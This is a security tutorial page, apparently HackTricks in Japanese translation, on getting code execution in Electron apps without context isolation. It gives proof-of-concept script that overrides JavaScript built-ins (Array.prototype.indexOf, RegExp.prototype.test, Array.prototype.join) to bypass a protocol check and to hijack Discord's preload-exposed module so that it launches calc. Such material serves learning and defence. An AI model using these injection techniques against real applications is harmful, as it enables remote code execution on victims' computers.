Electron contextIsolation RCE via preload code

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Example 1

https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30からの例

このコードはデフォルトのブラウザでhttp(s)リンクを開きます:

file:///C:/Windows/systemd32/calc.exeのようなものを使用してcalcを実行することができますが、SAFE_PROTOCOLS.indexOfがそれを防いでいます。

したがって、攻撃者はXSSまたは任意のページナビゲーションを介してこのJSコードを注入することができます:

<script>
Array.prototype.indexOf = function(){
return 1337;
}
</script>

SAFE_PROTOCOLS.indexOfを呼び出すと常に1337が返されるため、攻撃者は保護を回避し、calcを実行できます。最終的なエクスプロイト:

<script>
Array.prototype.indexOf = function(){
return 1337;
}
</script>
<a href="file:///C:/Windows/systemd32/calc.exe">CLICK</a>

オリジナルのスライドを確認して、許可を求めるプロンプトなしでプログラムを実行する他の方法を探してください。

どうやら、コードをロードして実行する別の方法は、file://127.0.0.1/electron/rce.jarのようなものにアクセスすることです。

例 2: Discord アプリ RCE

https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1からの例

プリロードスクリプトを確認したところ、Discordは、許可されたモジュールのいくつかをDiscordNative.nativeModules.requireModule('MODULE-NAME')を介してウェブページに呼び出すことを可能にする関数を公開しています。ここでは、_child_process_モジュールのようなRCEに直接使用できるモジュールを使用することはできませんでしたが、JavaScriptの組み込みメソッドをオーバーライドすることによってRCEを達成できるコードを見つけました。公開されたモジュールの実行に干渉します。

以下はPoCです。RegExp.prototype.testとArray.prototype.joinをオーバーライドしながら、"discord_utils"というモジュールで定義されたgetGPUDriverVersions関数を呼び出すと、calcアプリケーションがポップアップ**することを確認できました。

RegExp.prototype.test=function(){
return false;
}
Array.prototype.join=function(){
return "calc";
}
DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions();

getGPUDriverVersions 関数は、次のように "execa" ライブラリを使用してプログラムを実行しようとします。

module.exports.getGPUDriverVersions = async () => {
if (process.platform !== 'win32') {
return {};
}

const result = {};
const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`;

try {
result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, []));
} catch (e) {
result.nvidia = {error: e.toString()};
}

return result;
};

通常、execa_はnvidiaSmiPath変数に指定された"nvidia-smi.exe"を実行しようとしますが、オーバーライドされたRegExp.prototype.testとArray.prototype.joinのために、引数は_execa_の内部処理で"calc_"に置き換えられます。

具体的には、引数は以下の2つの部分を変更することで置き換えられます。

https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36

https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55